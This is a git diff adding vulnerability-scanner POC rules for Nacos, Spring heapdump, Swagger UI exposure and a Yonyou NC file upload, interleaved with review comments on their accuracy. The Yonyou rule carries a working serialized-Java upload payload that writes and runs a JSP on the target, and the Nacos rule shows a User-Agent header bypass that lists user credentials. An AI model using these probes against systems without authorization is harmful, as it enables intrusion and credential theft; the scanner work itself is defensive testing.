diff --git a/WebScan/pocs/alibaba-nacos-api-unauth.yml b/WebScan/pocs/alibaba-nacos-api-unauth.yml
new file mode 100644
index 0000000..52512fb
--- /dev/null
+++ b/WebScan/pocs/alibaba-nacos-api-unauth.yml
@@ -0,0 +1,15 @@
+name: poc-yaml-alibaba-nacos-api-unauth
+rules:
+  - method: GET
+    path: /nacos/v1/auth/users?pageNo=1&pageSize=9
+    headers:
+      User-Agent: Nacos-Server
+    follow_redirects: true
+    expression: |
+      response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
+detail:
+  author: AgeloVito
+  info: alibaba-nacos-api-unauth
+  login: nacos/nacos
+  links:
+    - https://blog.csdn.net/caiqiiqi/article/details/112005424
diff --git a/WebScan/pocs/alibaba-nacos.yml b/WebScan/pocs/alibaba-nacos.yml
new file mode 100644
index 0000000..34a4407
--- /dev/null
+++ b/WebScan/pocs/alibaba-nacos.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-alibaba-nacos
+rules:
+  - method: GET
+    path: /nacos/
+    follow_redirects: true
+    expression: |
+      response.body.bcontains(bytes("Nacos"))
+detail:
+  author: AgeloVito
+  info: alibaba-nacos
+  login: nacos/nacos
+  links:
+    - https://blog.csdn.net/caiqiiqi/article/details/112005424
diff --git a/WebScan/pocs/spring-actuator-heapdump-file.yml b/WebScan/pocs/spring-actuator-heapdump-file.yml
new file mode 100644
index 0000000..db481ae
--- /dev/null
+++ b/WebScan/pocs/spring-actuator-heapdump-file.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-spring-actuator-heapdump-file
+rules:
+  - method: HEAD
+    path: /actuator/heapdump
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.content_type.contains("application/octet-stream")
+detail:
+  author: AgeloVito
+  info: spring-actuator-heapdump-file
+  links:
+    - https://www.cnblogs.com/wyb628/p/8567610.html
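Review bot: The `login: nacos/nacos` entry under `detail` is misleading for this rule, because the request never authenticates; what makes `/nacos/v1/auth/users` answer is the `User-Agent: Nacos-Server` header, and a future maintainer could "clean up" that header without realising it is the whole bypass. Add a comment above the header, `# the server-to-server User-Agent is what bypasses auth; the rule is not a default-credential check`, and either drop `login` or move the default-credential hint into `info`. The expression also accepts any JSON body with those four substrings regardless of status; tightening it to `response.status == 200 && response.content_type.contains("application/json") && ...` avoids matching an error or login page that happens to echo the field names. Since the matched body is asserted to contain `username` and `password`, the finding should be described in `info` as user-table (credential hash) disclosure rather than the generic `alibaba-nacos-api-unauth`.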
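Review bot: The expression `response.body.bcontains(bytes("Nacos"))` with `follow_redirects: true` and no status check is a bare fingerprint, not a vulnerability test, yet the `detail` block carries `login: nacos/nacos` as if default credentials had been verified. Either the rule should actually exercise the login (which this hunk does not do) or `info` should say so explicitly, e.g. `info: alibaba-nacos console exposed (fingerprint only; default creds nacos/nacos not verified)`. At minimum prepend `response.status == 200 &&` so a redirect to an unrelated page that mentions "Nacos" does not produce a finding, and add a one-line comment stating that this POC only detects the console. Consider reporting it at informational severity so it is not counted alongside the user-listing POC.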
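Review bot: Using `HEAD` for `/actuator/heapdump` does not make the probe cheap: if the target dispatches HEAD to its GET handler (Spring MVC does this by default, though that is inferred rather than shown here), the server presumably still produces a full heap dump to disk and only discards the body, so every scan pauses the JVM and consumes the target's temp space. That side effect deserves a comment on the rule, `# HEAD still triggers heap-dump generation on the target; this is an expensive, noisy probe`, so operators scanning production hosts can opt out. The `status == 200 && octet-stream` check is a reasonable guard against HEAD-anything-200 servers, but `follow_redirects: true` means a redirect to a download endpoint would also match; note that limitation in `info`. Otherwise the detection logic is consistent with the sibling `/heapdump` POC.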
diff --git a/WebScan/pocs/spring-heapdump-file.yml b/WebScan/pocs/spring-heapdump-file.yml
new file mode 100644
index 0000000..148930d
--- /dev/null
+++ b/WebScan/pocs/spring-heapdump-file.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-spring-heapdump-file
+rules:
+  - method: HEAD
+    path: /heapdump
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.content_type.contains("application/octet-stream")
+detail:
+  author: AgeloVito
+  info: spring-heapdump-file
+  links:
+    - https://www.cnblogs.com/wyb628/p/8567610.html
diff --git a/WebScan/pocs/swagger-ui-unauth-No1.yml b/WebScan/pocs/swagger-ui-unauth-No1.yml
new file mode 100644
index 0000000..591293f
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No1.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No2.yml b/WebScan/pocs/swagger-ui-unauth-No2.yml
new file mode 100644
index 0000000..f93e8f9
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No2.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /api/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No3.yml b/WebScan/pocs/swagger-ui-unauth-No3.yml
new file mode 100644
index 0000000..da56fc4
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No3.yml
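Review bot: This file is byte-identical to `spring-actuator-heapdump-file.yml` except for `path: /heapdump`, and nothing in the hunk records why both exist; a reader maintaining one will not know to update the other. Add a comment on the path, `# presumably the pre-/actuator (Spring Boot 1.x-style) endpoint location; /actuator/heapdump is covered by the sibling POC` (hedged because the hunk itself does not say which versions use which prefix). The same caveat as the sibling applies: a HEAD request likely still makes the target generate the dump, so document it as an expensive probe. If the POC format ever supports alternate paths in one rule set, these two should be merged.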
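Review bot: The `name` field reads `poc-yaml-druid-monitor-unauth`, which does not match the file (`swagger-ui-unauth-No1.yml`) or the path `/swagger-ui.html`; it looks copied from a Druid POC, so every hit will be reported under the wrong product. Change it to `name: poc-yaml-swagger-ui-unauth-no1` (or a per-path suffix consistent with the other seven files) and add `info: swagger-ui exposed at /swagger-ui.html` under `detail`, which currently has no description at all. The marker `swagger-ui.min.js` may not appear in every Swagger UI distribution (newer bundles ship differently named scripts), so note that limitation in a comment rather than treating absence as "not exposed". Finally, an exposed Swagger UI is API-surface disclosure rather than an auth bypass, so "unauth" in the name overstates the finding.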
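Review bot: Same copy-paste defect as the No1 file: `name: poc-yaml-druid-monitor-unauth` mislabels a Swagger UI check at `/api/swagger-ui.html`, and because all eight swagger files share this name their findings are indistinguishable in output. Rename to `name: poc-yaml-swagger-ui-unauth-no2` and add `info: swagger-ui exposed at /api/swagger-ui.html` under `detail`.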
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /service/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No4.yml b/WebScan/pocs/swagger-ui-unauth-No4.yml
new file mode 100644
index 0000000..296ea00
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No4.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /web/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No5.yml b/WebScan/pocs/swagger-ui-unauth-No5.yml
new file mode 100644
index 0000000..9b58279
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No5.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /swagger/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No6.yml b/WebScan/pocs/swagger-ui-unauth-No6.yml
new file mode 100644
index 0000000..52d330b
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No6.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /actuator/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
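Review bot: `name: poc-yaml-druid-monitor-unauth` is wrong for a Swagger UI probe at `/service/swagger-ui.html` and collides with the name used by the other swagger files, so results cannot be attributed to a path. Rename to `name: poc-yaml-swagger-ui-unauth-no3` and add `info: swagger-ui exposed at /service/swagger-ui.html` under `detail`. This file's header lines (`diff`/`---`/`+++`) sit on the previous physical line of the patch.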
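Review bot: Same mislabel as the other swagger files: `name: poc-yaml-druid-monitor-unauth` for `/web/swagger-ui.html`. Rename to `name: poc-yaml-swagger-ui-unauth-no4` and add `info: swagger-ui exposed at /web/swagger-ui.html` so the finding names the product and path it actually tested.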
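Review bot: `name: poc-yaml-druid-monitor-unauth` again mislabels this `/swagger/swagger-ui.html` check. Rename to `name: poc-yaml-swagger-ui-unauth-no5` and add `info: swagger-ui exposed at /swagger/swagger-ui.html` under `detail`, which is otherwise empty apart from author and link.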
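Review bot: `name: poc-yaml-druid-monitor-unauth` mislabels this `/actuator/swagger-ui.html` probe; rename to `name: poc-yaml-swagger-ui-unauth-no6` and add `info: swagger-ui exposed at /actuator/swagger-ui.html`. Because the path lives under the actuator prefix, a hit here is also a hint that other actuator endpoints are reachable, which is worth a one-line comment so triage cross-references the heapdump POCs in this same commit.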
diff --git a/WebScan/pocs/swagger-ui-unauth-No7.yml b/WebScan/pocs/swagger-ui-unauth-No7.yml
new file mode 100644
index 0000000..ebaebf4
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No7.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /libs/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/swagger-ui-unauth-No8.yml b/WebScan/pocs/swagger-ui-unauth-No8.yml
new file mode 100644
index 0000000..323451b
--- /dev/null
+++ b/WebScan/pocs/swagger-ui-unauth-No8.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-druid-monitor-unauth
+rules:
+  - method: GET
+    path: /template/swagger-ui.html
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
+detail:
+  author: AgeloVito
+  links:
+    - https://blog.csdn.net/u012206617/article/details/109107210
diff --git a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml
new file mode 100644
index 0000000..8e6b75e
--- /dev/null
+++ b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml
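Review bot: `name: poc-yaml-druid-monitor-unauth` mislabels this `/libs/swagger-ui.html` probe. Rename to `name: poc-yaml-swagger-ui-unauth-no7` and add `info: swagger-ui exposed at /libs/swagger-ui.html` under `detail`.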
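Review bot: `name: poc-yaml-druid-monitor-unauth` mislabels this `/template/swagger-ui.html` probe, the last of eight files that differ only in `path`. Rename to `name: poc-yaml-swagger-ui-unauth-no8` and add `info: swagger-ui exposed at /template/swagger-ui.html`. A comment at the top of one of these files listing all eight paths would make it clear they are a set and keep future path additions consistent.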
@@ -0,0 +1,26 @@
+name: poc-yaml-yonyou-nc-arbitrary-file-upload
+set:
+  r1: randomInt(10000, 20000)
+  r2: randomInt(1000000000, 2000000000)
+  r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t"
+  r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx"
+rules:
+  - method: POST
+    path: /servlet/FileReceiveServlet
+    headers:
+      Content-Type: multipart/form-data;
+    body: >-
+      {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+    expression: |
+      response.status == 200
+  - method: GET
+    path: '/{{r1}}.jsp'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r2)))
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  Affected Version: "YONYOU NC > 6.5"
+  links:
+    - https://blog.csdn.net/weixin_44578334/article/details/110917053
\ No newline at end of file
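Review bot: The `set` block hides a length coupling that nothing documents: `r3` ends with the serialized-string length prefix `t\x00\t` (9 bytes) for the file name, so `{{r1}}.jsp` must be exactly 9 characters, which only holds because `randomInt(10000, 20000)` yields five-digit values; likewise the `\x10` prefixes in `r4` match the 16-byte `TARGET_FILE_PATH` and `./webapps/nc_web`. Add a comment above `r1`, `# must stay 5 digits: r3 ends with a 0x09 length byte covering "<r1>.jsp"`, and one above `r4` noting the 0x10 length bytes, so a future range tweak does not silently corrupt the stream and fail the POST. The uploaded JSP only deletes itself when the second rule's GET to `/{{r1}}.jsp` actually executes it; if the upload succeeds but the file is served under a different context path, the scanner leaves an executable JSP on the target, so a comment such as `# intrusive: writes a JSP to ./webapps/nc_web; self-deletes only if the verification GET reaches it` is warranted. The `Affected Version: "YONYOU NC > 6.5"` key both contains a space and contradicts the filename `nc6.5`; clarify the intended range (`>=`, `<=`, or exactly 6.5) and use a key like `affected_version`.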